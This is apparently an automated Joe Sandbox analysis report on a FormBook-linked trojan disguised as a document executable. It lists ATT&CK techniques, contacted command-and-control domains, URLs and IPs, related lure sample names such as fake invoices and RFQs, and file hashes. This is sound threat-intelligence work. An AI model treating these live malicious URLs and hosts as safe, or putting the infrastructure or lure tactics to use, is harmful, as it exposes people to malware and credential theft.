Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	612 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Abuse Elevation Control Mechanism	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RN# D7521-RN-00353 REV-2.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://www.theclydefund.info/pt4m/?sL9tFJ=gto6zAZEImMHeJ+LpJq54hk6oy5OM0JeZOEv9IoNosKW45cXkvVUXc/PKOyk1O8wCdnCAQISoXLeySDC7Pr7VLt7iUiMsNXrOKCvlG99AM7B8PQExMggQoQ=&gB7t=xFqX1hC8	0%	Avira URL Cloud	safe
http://www.mudanya-nakliyat.xyz/51hg/	0%	Avira URL Cloud	safe
http://www.comrade.lol/oigd/?sL9tFJ=XnrNo/zlUnrEuFxFTUYkG7ae+f7+plKfKKk7EkLGEdvHK0jxala+8MCeNIwWRYprQHn5WBVAcJl6ovxdzs+7zbqSxrzmMB33zbmHRpf7OsMcrqzoZipyUU4=&gB7t=xFqX1hC8	0%	Avira URL Cloud	safe
http://www.inf30027group23.xyz/ljdj/	0%	Avira URL Cloud	safe
http://www.x100.shop	0%	Avira URL Cloud	safe
http://www.x100.shop/uaxy/	0%	Avira URL Cloud	safe
http://www.comrade.lol/oigd/	0%	Avira URL Cloud	safe
http://www.theclydefund.info/pt4m/	0%	Avira URL Cloud	safe
http://www.airtech365.net/87wq/	0%	Avira URL Cloud	safe
http://www.luxe.guru/s9un/	0%	Avira URL Cloud	safe
http://newdaydawning.net/paa2/?sL9tFJ=n7l4pK2vJUox4BGRRaSHHdo	0%	Avira URL Cloud	safe
http://www.solargridxx.shop/m4jf/?sL9tFJ=0TgQC1Luv9cVf1TCKLCdjgzht3H610PutW8Pu5k4ZnbC5HUSntLYriRCMSQSDyNJ5vKB93oSdDtzFOKGboJdJ4jxO8kQzN3YuKmjgHKVRyz7ENXIVwzZU4M=&gB7t=xFqX1hC8	0%	Avira URL Cloud	safe
http://www.crowsecurity.cloud/dt20/	0%	Avira URL Cloud	safe
http://www.mudanya-nakliyat.xyz/51hg/?sL9tFJ=lzb8Q+1ZkRYL+ndO3j5PVMDGwV51DFPdeivGsnVW/hUSyu5WpgLMVT/2ZD9ppe7fxW6d+w7xhCgyU1oioUeFR6Wo19Fxr1GQyE0P1h5QkDnbWNzfENeGUo8=&gB7t=xFqX1hC8	0%	Avira URL Cloud	safe
http://www.x100.shop/uaxy/?sL9tFJ=jCoxKbndYFu2rVUc2fNf8o1DCs+xE29ELzrRYPIrNX671AzrKUsZ0ekHPlezV1wvKt2FOH2y7yDiMlHHG1j7pH9tJsj87FCdBv0goUpKNozmpGwQ2nrx39s=&gB7t=xFqX1hC8	0%	Avira URL Cloud	safe
http://www.languyenthuyduyen.xyz/ctkk/	0%	Avira URL Cloud	safe
http://www.crowsecurity.cloud/dt20/?sL9tFJ=jMzfQmQmIDSzouF6Lox+3L2FgGYq5APQ95A7i7hmDDVLCGCM44ipqB5JCC3ZLSV4hUu+HvHwJbctiEvq8GXK62TkioYWTvl/FFz4Ja2JDvEPYzlsAsi7VtI=&gB7t=xFqX1hC8	0%	Avira URL Cloud	safe
http://www.63582.photo/i70z/?gB7t=xFqX1hC8&sL9tFJ=ggo41uDwxRIOOoeP1Oo5p7RDznCtlfKlzUAj4DLPY1E55MlxYQjRP3RbpEn9FapIu2dLvf4ZjTINa65Ki93S9Jq8KjMoDKqt4A2Swb3ejqHfvRtW1ozGZVs=	0%	Avira URL Cloud	safe
http://www.airtech365.net/87wq/?sL9tFJ=7bLn2toYuHgKY4svyzPVudTtlla1bf7PpnNwFD1LjHXMN8tsWMAuSdGiuKH0HcFEBqk44V2BEBEKz59MOu/v9Tn1fU8u33FZ8GhyTM58dtSMSWcfKlkKKIE=&gB7t=xFqX1hC8	0%	Avira URL Cloud	safe
http://www.stayup.top/gubb/?sL9tFJ=oPjgdHtcRwBFU1aA9ZOuj8Coc4bNSQhA+Z/l/vbVu6gyzA9FNnh3E8/0K3U760fP/mUdrl6a4REPJue/mxKU4Ri2QVEaCVjMmKnjA5rRPYPki2Nnm5W7gsk=&gB7t=xFqX1hC8	0%	Avira URL Cloud	safe
http://www.luxe.guru/s9un/?sL9tFJ=yV7TdkxfDhjd90B0KSEuK0Kqfi+wDaIV0zBeo1/164guPJfW3iKC9HyL21G52/AKQq5uaAr+ytnoQTz6UIOzVvXcy/Dczt/UyMTK+ZYHHCEGw8ax0ZASRvI=&gB7t=xFqX1hC8	0%	Avira URL Cloud	safe
http://inf30027group23.xyz/ljdj/?sL9tFJ=ZICPfDYGGExxFAxCww1xwUjvDbJY85yXQI6dp2kJB8RnqeyNXlFMy7FVDhew	0%	Avira URL Cloud	safe
http://www.newdaydawning.net/paa2/	0%	Avira URL Cloud	safe
http://www.solargridxx.shop/m4jf/	0%	Avira URL Cloud	safe
http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi?sL9tFJ=kPi1sGtrrK6MgvdeecyTfrcQSpO0wr028E	0%	Avira URL Cloud	safe
http://www.stayup.top/gubb/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
theclydefund.info	3.33.130.190	true	true	unknown
www.languyenthuyduyen.xyz	103.255.237.233	true	true	unknown
crowsecurity.cloud	3.33.130.190	true	true	unknown
newdaydawning.net	44.213.25.70	true	true	unknown
www.x100.shop	13.248.252.114	true	true	unknown
www.stayup.top	203.161.43.245	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	true	unknown
www.luxe.guru	13.248.169.48	true	true	unknown
airtech365.net	3.33.130.190	true	true	unknown
azkwupgf.as66588.com	147.92.40.174	true	true	unknown
comrade.lol	3.33.130.190	true	true	unknown
solargridxx.shop	50.3.111.89	true	true	unknown
inf30027group23.xyz	221.121.144.149	true	true	unknown
www.popin.space	unknown	unknown	true	unknown
www.mudanya-nakliyat.xyz	unknown	unknown	true	unknown
www.newdaydawning.net	unknown	unknown	true	unknown
www.crowsecurity.cloud	unknown	unknown	true	unknown
www.airtech365.net	unknown	unknown	true	unknown
www.inf30027group23.xyz	unknown	unknown	true	unknown
www.comrade.lol	unknown	unknown	true	unknown
www.13149200.xyz	unknown	unknown	true	unknown
www.theclydefund.info	unknown	unknown	true	unknown
www.63582.photo	unknown	unknown	true	unknown
www.bonusgame2024.online	unknown	unknown	true	unknown
www.solargridxx.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.theclydefund.info/pt4m/?sL9tFJ=gto6zAZEImMHeJ+LpJq54hk6oy5OM0JeZOEv9IoNosKW45cXkvVUXc/PKOyk1O8wCdnCAQISoXLeySDC7Pr7VLt7iUiMsNXrOKCvlG99AM7B8PQExMggQoQ=&gB7t=xFqX1hC8	true	Avira URL Cloud: safe	unknown
http://www.inf30027group23.xyz/ljdj/	true	Avira URL Cloud: safe	unknown
http://www.comrade.lol/oigd/?sL9tFJ=XnrNo/zlUnrEuFxFTUYkG7ae+f7+plKfKKk7EkLGEdvHK0jxala+8MCeNIwWRYprQHn5WBVAcJl6ovxdzs+7zbqSxrzmMB33zbmHRpf7OsMcrqzoZipyUU4=&gB7t=xFqX1hC8	true	Avira URL Cloud: safe	unknown
http://www.mudanya-nakliyat.xyz/51hg/	true	Avira URL Cloud: safe	unknown
http://www.airtech365.net/87wq/	true	Avira URL Cloud: safe	unknown
http://www.x100.shop/uaxy/	true	Avira URL Cloud: safe	unknown
http://www.comrade.lol/oigd/	true	Avira URL Cloud: safe	unknown
http://www.luxe.guru/s9un/	true	Avira URL Cloud: safe	unknown
http://www.theclydefund.info/pt4m/	true	Avira URL Cloud: safe	unknown
http://www.x100.shop/uaxy/?sL9tFJ=jCoxKbndYFu2rVUc2fNf8o1DCs+xE29ELzrRYPIrNX671AzrKUsZ0ekHPlezV1wvKt2FOH2y7yDiMlHHG1j7pH9tJsj87FCdBv0goUpKNozmpGwQ2nrx39s=&gB7t=xFqX1hC8	true	Avira URL Cloud: safe	unknown
http://www.crowsecurity.cloud/dt20/	true	Avira URL Cloud: safe	unknown
http://www.mudanya-nakliyat.xyz/51hg/?sL9tFJ=lzb8Q+1ZkRYL+ndO3j5PVMDGwV51DFPdeivGsnVW/hUSyu5WpgLMVT/2ZD9ppe7fxW6d+w7xhCgyU1oioUeFR6Wo19Fxr1GQyE0P1h5QkDnbWNzfENeGUo8=&gB7t=xFqX1hC8	true	Avira URL Cloud: safe	unknown
http://www.solargridxx.shop/m4jf/?sL9tFJ=0TgQC1Luv9cVf1TCKLCdjgzht3H610PutW8Pu5k4ZnbC5HUSntLYriRCMSQSDyNJ5vKB93oSdDtzFOKGboJdJ4jxO8kQzN3YuKmjgHKVRyz7ENXIVwzZU4M=&gB7t=xFqX1hC8	true	Avira URL Cloud: safe	unknown
http://www.crowsecurity.cloud/dt20/?sL9tFJ=jMzfQmQmIDSzouF6Lox+3L2FgGYq5APQ95A7i7hmDDVLCGCM44ipqB5JCC3ZLSV4hUu+HvHwJbctiEvq8GXK62TkioYWTvl/FFz4Ja2JDvEPYzlsAsi7VtI=&gB7t=xFqX1hC8	true	Avira URL Cloud: safe	unknown
http://www.languyenthuyduyen.xyz/ctkk/	true	Avira URL Cloud: safe	unknown
http://www.63582.photo/i70z/?gB7t=xFqX1hC8&sL9tFJ=ggo41uDwxRIOOoeP1Oo5p7RDznCtlfKlzUAj4DLPY1E55MlxYQjRP3RbpEn9FapIu2dLvf4ZjTINa65Ki93S9Jq8KjMoDKqt4A2Swb3ejqHfvRtW1ozGZVs=	true	Avira URL Cloud: safe	unknown
http://www.airtech365.net/87wq/?sL9tFJ=7bLn2toYuHgKY4svyzPVudTtlla1bf7PpnNwFD1LjHXMN8tsWMAuSdGiuKH0HcFEBqk44V2BEBEKz59MOu/v9Tn1fU8u33FZ8GhyTM58dtSMSWcfKlkKKIE=&gB7t=xFqX1hC8	true	Avira URL Cloud: safe	unknown
http://www.stayup.top/gubb/?sL9tFJ=oPjgdHtcRwBFU1aA9ZOuj8Coc4bNSQhA+Z/l/vbVu6gyzA9FNnh3E8/0K3U760fP/mUdrl6a4REPJue/mxKU4Ri2QVEaCVjMmKnjA5rRPYPki2Nnm5W7gsk=&gB7t=xFqX1hC8	true	Avira URL Cloud: safe	unknown
http://www.luxe.guru/s9un/?sL9tFJ=yV7TdkxfDhjd90B0KSEuK0Kqfi+wDaIV0zBeo1/164guPJfW3iKC9HyL21G52/AKQq5uaAr+ytnoQTz6UIOzVvXcy/Dczt/UyMTK+ZYHHCEGw8ax0ZASRvI=&gB7t=xFqX1hC8	true	Avira URL Cloud: safe	unknown
http://www.newdaydawning.net/paa2/	true	Avira URL Cloud: safe	unknown
http://www.stayup.top/gubb/	true	Avira URL Cloud: safe	unknown
http://www.solargridxx.shop/m4jf/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.x100.shop	uIklAoJgpkP.exe, 0000000B.00000002.4131269057.0000000004AE2000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.5.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://newdaydawning.net/paa2/?sL9tFJ=n7l4pK2vJUox4BGRRaSHHdo	auditpol.exe, 0000000A.00000002.4130231943.000000000467C000.00000004.10000000.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129772358.000000000308C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://inf30027group23.xyz/ljdj/?sL9tFJ=ZICPfDYGGExxFAxCww1xwUjvDbJY85yXQI6dp2kJB8RnqeyNXlFMy7FVDhew	auditpol.exe, 0000000A.00000002.4130231943.0000000004FE8000.00000004.10000000.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129772358.00000000039F8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi?sL9tFJ=kPi1sGtrrK6MgvdeecyTfrcQSpO0wr028E	auditpol.exe, 0000000A.00000002.4130231943.0000000004B32000.00000004.10000000.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129772358.0000000003542000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	auditpol.exe, 0000000A.00000002.4131998197.0000000007F98000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.luxe.guru	United States	16509	AMAZON-02US	true
103.255.237.233	www.languyenthuyduyen.xyz	Viet Nam	45899	VNPT-AS-VNVNPTCorpVN	true
44.213.25.70	newdaydawning.net	United States	14618	AMAZON-AESUS	true
221.121.144.149	inf30027group23.xyz	Australia	45671	AS45671-NET-AUWholesaleServicesProviderAU	true
50.3.111.89	solargridxx.shop	United States	62904	EONIX-COMMUNICATIONS-ASBLOCK-62904US	true
203.161.43.245	www.stayup.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
147.92.40.174	azkwupgf.as66588.com	Hong Kong	59371	DNC-ASDimensionNetworkCommunicationLimitedHK	true
3.33.130.190	theclydefund.info	United States	8987	AMAZONEXPANSIONGB	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true
13.248.252.114	www.x100.shop	United States	16509	AMAZON-02US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519424
Start date and time:	2024-09-26 14:22:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RN# D7521-RN-00353 REV-2.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/6@18/10
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 84% Number of executed functions: 69 Number of non-executed functions: 248
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: RN# D7521-RN-00353 REV-2.exe

Simulations

Behavior and APIs

Time	Type	Description
08:23:19	API Interceptor	1x Sleep call for process: WerFault.exe modified
08:24:12	API Interceptor	11471193x Sleep call for process: auditpol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	gvyO903Xmm.exe	Get hash	malicious	FormBook	Browse	www.4it.services/bopi/?_FQ8hB=RB9p3Jfq9ZvBoyq8+0+Fmui7HG2krdiIZXqgFfVf6IzsfIQ1CkKG0m46V1pTk3XN6PXG&qL3=eXSlCFXxoF
	CITA#U00c7#U00c3O.exe	Get hash	malicious	FormBook	Browse	www.dyme.tech/h7lb/
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.smilechat.shop/ih4n/
	PO For Bulk Order.exe	Get hash	malicious	FormBook	Browse	www.sapatarias.online/ep7t/
	CYTAT.exe	Get hash	malicious	FormBook	Browse	www.dyme.tech/h7lb/
	UMOWA_PD.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.invicta.world/tcs6/
	RFQ urrgently.exe	Get hash	malicious	FormBook	Browse	www.smilechat.shop/ih4n/
	inquiry and prices EO-230807.exe	Get hash	malicious	FormBook	Browse	www.luxe.guru/s9un/
	HBLAWBP.LISTCOC & INV.exe	Get hash	malicious	FormBook	Browse	www.luxe.guru/s9un/
	Petronas quotation request.exe	Get hash	malicious	FormBook	Browse	www.smilechat.shop/ih4n/
103.255.237.233	HBLAWBP.LISTCOC & INV.exe	Get hash	malicious	FormBook	Browse	www.languyenthuyduyen.xyz/ctkk/
44.213.25.70	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	www.newdaydawning.net/q1on/
	inquiry and prices EO-230807.exe	Get hash	malicious	FormBook	Browse	www.newdaydawning.net/paa2/
	HBLAWBP.LISTCOC & INV.exe	Get hash	malicious	FormBook	Browse	www.newdaydawning.net/paa2/
	NEW ORDERS scan_29012019.exe	Get hash	malicious	FormBook	Browse	www.newdaydawning.net/paa2/
	PROFOMA INVOICE SHEET.exe	Get hash	malicious	FormBook	Browse	www.newdaydawning.net/72tr/
221.121.144.149	List of Items0001.doc.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.inf30027group23.xyz/ekqf/
221.121.144.149	BL Draft-Invoice-Packing list-Shipping Document.pif.exe	Get hash	malicious	FormBook	Browse	www.inf30027group23.xyz/xzfm/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.languyenthuyduyen.xyz	HBLAWBP.LISTCOC & INV.exe	Get hash	malicious	FormBook	Browse	103.255.237.233
www.languyenthuyduyen.xyz	NEW ORDERS scan_29012019.exe	Get hash	malicious	FormBook	Browse	103.255.237.233
natroredirect.natrocdn.com	CITA#U00c7#U00c3O.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	rAGROTIS10599242024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	oO3ZmCAeLQ.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Purchase Order_ AEPL-2324-1126.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	AWB_5771388044 Documenti di spedizione.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Cotizaci#U00f3n.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO2024033194.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	FvYlbhvZrZ.rtf	Get hash	malicious	FormBook	Browse	85.159.66.93
	SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsx	Get hash	malicious	FormBook	Browse	85.159.66.93
www.stayup.top	inquiry and prices EO-230807.exe	Get hash	malicious	FormBook	Browse	203.161.43.245
	HBLAWBP.LISTCOC & INV.exe	Get hash	malicious	FormBook	Browse	203.161.43.245
	NEW ORDERS scan_29012019.exe	Get hash	malicious	FormBook	Browse	203.161.43.245
www.luxe.guru	inquiry and prices EO-230807.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	HBLAWBP.LISTCOC & INV.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	NEW ORDERS scan_29012019.exe	Get hash	malicious	FormBook	Browse	13.248.169.48

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS45671-NET-AUWholesaleServicesProviderAU	SecuriteInfo.com.Linux.Siggen.9999.13221.8731.elf	Get hash	malicious	Unknown	Browse	202.60.94.156
	List of Items0001.doc.exe	Get hash	malicious	FormBook, GuLoader	Browse	221.121.144.149
	BL Draft-Invoice-Packing list-Shipping Document.pif.exe	Get hash	malicious	FormBook	Browse	221.121.144.149
	rfq_last_quater_product_purchase_order_import_list_16_06_2024_000000160924.bat.exe	Get hash	malicious	Remcos	Browse	27.50.75.67
	rfq_final_quater_product_purchase_order_import_list_09_09_2024_00000024.cmd	Get hash	malicious	GuLoader, Remcos	Browse	27.50.75.67
	rfqlastquaterproductpurchaseorderimportlist09.bat	Get hash	malicious	GuLoader, Remcos	Browse	27.50.75.67
	rfq_last_quater_product_purchase_order_import_list_09_05_2024_00000024.cmd	Get hash	malicious	GuLoader, Remcos	Browse	27.50.75.67
	sora.x86.elf	Get hash	malicious	Mirai	Browse	202.60.94.177
	http://simplyelearning.com.au	Get hash	malicious	Unknown	Browse	202.131.88.121
	http://cabinetsonline.com.au	Get hash	malicious	Unknown	Browse	221.121.149.243
VNPT-AS-VNVNPTCorpVN	7fi7NmSbkN.elf	Get hash	malicious	Mirai	Browse	14.227.0.85
	rsJtZBgpwG.elf	Get hash	malicious	Mirai	Browse	14.180.57.19
	http://hscpoly.marksbookspace.shop/?/Hscpoly/Hscpoly#Bob.Jenkins@Hscpoly.Com##	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	203.161.61.2
	http://support-metahelpcenter-id100003498934.netlify.app/help/support/client_id=900521099500510	Get hash	malicious	Unknown	Browse	203.161.55.155
	inquiry and prices EO-230807.exe	Get hash	malicious	FormBook	Browse	203.161.43.245
	HBLAWBP.LISTCOC & INV.exe	Get hash	malicious	FormBook	Browse	203.161.43.245
	PO#801624.exe	Get hash	malicious	FormBook	Browse	203.161.41.254
	SecuriteInfo.com.Linux.Siggen.9999.31454.15725.elf	Get hash	malicious	Unknown	Browse	14.234.11.2
	SecuriteInfo.com.Linux.Siggen.9999.32167.12194.elf	Get hash	malicious	Unknown	Browse	113.166.174.141
	SecuriteInfo.com.Linux.Siggen.9999.11593.30273.elf	Get hash	malicious	Unknown	Browse	113.178.195.89
AMAZON-AESUS	https://game-repack.site/2024/09/26/bloodborne	Get hash	malicious	Unknown	Browse	3.221.8.11
	https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdf	Get hash	malicious	HTMLPhisher	Browse	54.81.180.79
	HPDeskJet_043_SCAN.pdf	Get hash	malicious	Phisher	Browse	54.144.73.197
	Contract_Agreement_Wednesday September 2024.pdf	Get hash	malicious	Unknown	Browse	52.5.13.197
	H9DsG7WKGt.exe	Get hash	malicious	FormBook	Browse	34.205.242.146
	mfsH98ISNV.exe	Get hash	malicious	Unknown	Browse	3.80.28.180
	http://tiktoksc.xyz/	Get hash	malicious	Unknown	Browse	3.5.21.101
	http://tiktok1688.cc/	Get hash	malicious	Unknown	Browse	3.5.8.150
	https://tkshopax1.cc/	Get hash	malicious	Unknown	Browse	3.5.9.100
	https://tiktok-shopsxx.top/	Get hash	malicious	Unknown	Browse	3.5.25.228
AMAZON-02US	http://t.nypost.com/1/e/r?aqet=clk&r=2&ca=35257893&v0=rhn21600@pvwfzajcv.com&yf=//youtube.com.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&ru=//eddieslawn.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&yf=//eduyieldyf.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==	Get hash	malicious	HTMLPhisher	Browse	13.33.187.116
	https://game-repack.site/2024/09/26/bloodborne	Get hash	malicious	Unknown	Browse	143.204.215.42
	https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdf	Get hash	malicious	HTMLPhisher	Browse	3.71.149.231
	sRMytgfRpJ.exe	Get hash	malicious	RedLine	Browse	185.166.143.49
	g3V051umJf.html	Get hash	malicious	Unknown	Browse	13.32.99.92
	https://cantanero.pro/	Get hash	malicious	HTMLPhisher	Browse	76.76.21.22
	https://pdftomuchmattersupdatings-vercel-app.translate.goog/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp	Get hash	malicious	Unknown	Browse	76.76.21.98
	eMoS6hG54p.exe	Get hash	malicious	FormBook	Browse	13.248.252.114
	gvyO903Xmm.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	CITA#U00c7#U00c3O.exe	Get hash	malicious	FormBook	Browse	13.248.169.48

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RN# D7521-RN-003_fe7c22bab8f2bb1b237e989214cbd58e6a8ae26d_5620e956_6b757824-e979-46a1-a72f-f10a4cd95fad\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9960275783823995
Encrypted:	false
SSDEEP:	192:nWuB2vPPZ50UnUlaWBUUCzuiFSZ24lO8o:WpPP0UnUlamU7zuiFSY4lO8o
MD5:	8C48696325246B946096648D9E994079
SHA1:	C7A16AF7950A13585C4C681DB2E6DDA4DA0A5E79
SHA-256:	BD2339D731E8C1F033D60627D21E35A2830CD61E6D70F9E1F64D65A900CCA468
SHA-512:	6E34C7F915FCD951183FF3B12014C436A3FBE29CDF2199A105F9366012D9C9EBF25D865D23722519FF1072A56794470B388097F4E7B1C8366418487D22549946
Malicious:	false
Reputation:	low
